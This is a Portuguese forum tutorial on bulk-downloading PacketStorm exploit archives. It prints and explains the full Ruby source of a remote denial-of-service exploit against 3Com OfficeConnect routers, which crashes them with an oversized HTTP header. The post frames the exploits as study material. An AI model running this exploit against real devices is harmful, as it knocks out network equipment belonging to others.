Results 1 to 1 of 1

Thread: Download mensal e Anual dos exploits do PacketStorm - Parte 2

  1. #1
    Moderator firebits's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    353

    Default Download mensal e Anual dos exploits do PacketStorm - Parte 2

    Passo 3:

    Caso você precise de todos os exploits, sem ter que ler um por um e facilitar o processo de tradução e teste dos exploits, é bem simples:
    Passo 4:

    Você clica na pasta que corresponde ao Ano e Mês, dos exploits e depois no fim da URL, você adiciona "AnoMes.tgz", sem as aspas, como na figura abaixo:
    Se uma tela de download aparecer, faça o download e você terá o código-fonte de todos os exploits.

    Vamos ver um exemplo de exploit do mês de dezembro de 2009, que em inglês seria a data curta em formato AAMM (ano e mês).

    O exploit 3com_ctdos.rb.txt é feito em Ruby, devido a presença do extensão *.rb antes do *.txt (provavelmente adicionaram a extensão *.txt para evitar problemas em alguns antivírus). O código-fonte (source code) contém comandos de Ruby e o próprio autor afirmou, no código-fonte, que a linguagem utilizada era Ruby (veja em Exploit language -> Ruby).

    Explicando a ideia do exploit 3com_ctdos.rb.txt

    Modelo do equipamento que o autor testou:
    • Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72


    Versão do firmware que foi testado e quando.
    • Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)


    Quais os SO foram testados:
    • Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7


    Linguagem de programação usada para a exploração (exploit):
    • Exploit language -> Ruby


    Tipo de ataque, no caso DoS - Denial of Service (Negação de Serviço) via HTTP:
    • Type -> Remote Denial of Service Exploit by HTTP


    Informações adicionais sobre este exploit:
    • Additional info: The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.


    Quem foi o autor do exploit e como contactá-lo:
    • Discovered and written by Alberto Ortega - PenTBox

    Código-fonte (source Code) do exploit "3com_ctdos.rb.txt"

    ###############
    # Model -> Tested on 3Com OfficeConnect ADSL Wireless
    # 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
    # Software Version -> Tested on 2.06T13 (Apr 2007,
    # last version for these routers)
    # Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
    #
    # Exploit languaje -> Ruby
    # Type -> Remote Denial of Service Exploit by HTTP
    #
    # Additional info:
    # - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
    #
    ###############
    # Discovered and written by Alberto Ortega
    # PenTBox
    ###############

    require "socket"

    host = ARGV[0]
    buffer = "A"
    send = ""

    puts ""
    if !host
    puts " 3Com OfficeConnect ADSL Wireless 11g Firewall Router"
    puts " Remote DoS Exploit by HTTP"
    puts " ------ Usage ---------------------------------------"
    puts " ruby 3com_dosexploit.rb host"
    puts " Ex: ruby 3com_dosexploit.rb 192.168.1.1"
    else
    begin
    socket = TCPSocket.new(host, 80)
    puts "- Exploiting ..."
    # 8.times is enough to DoS
    9.times do
    buffer = "#{buffer}#{buffer}"
    end

    # Here are the HTTP packet, Content-Type value causes the DoS
    send = "GET / HTTP/1.1\r\nContent-Type:#{buffer}\r\n"
    socket.write(send)
    puts "- Successfully! :)"
    rescue
    puts "Connection problem"
    end
    end
    puts ""


    Obs.: Em alguns SO com antivírus, será detectado como vírus mesmo sendo arquivo de texto puro, pois os arquivos são examinados internamente. Você já tem sua coleção de exploits, que são como "escorpiões" e "aranhas" para estudarmos.

    Tome cuidado ao usá-los e NÃO TESTE EM SEU PRÓPRIO COMPUTADOR, POIS VOCÊ PODERÁ TER PROBLEMAS. Monte uma máquina virtual em VirtualBox, VMware ou QEMU e faça testes antes.

    Artigo Próprio por firebits
    http://www.backtrack-linux.org/forum.../firebits.html
    Last edited by firebits; 04-17-2010 at 04:31 PM.

Similar Threads

  1. Download mensal e Anual dos exploits do PacketStorm - Parte 1
    By firebits in forum Tutoriais e Howtos
    Replies: 0
    Last Post: 04-08-2010, 12:53 PM
  2. Replies: 0
    Last Post: 03-28-2010, 06:59 PM
  3. Non parte l'interfaccia grafica!!!
    By trupisalvo in forum Supporto Hardware
    Replies: 2
    Last Post: 03-09-2010, 04:20 PM
  4. PacketStorm Security Exploit Archive Snatcher
    By proteus-ocm in forum OLD Pentesting
    Replies: 1
    Last Post: 10-19-2009, 02:26 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •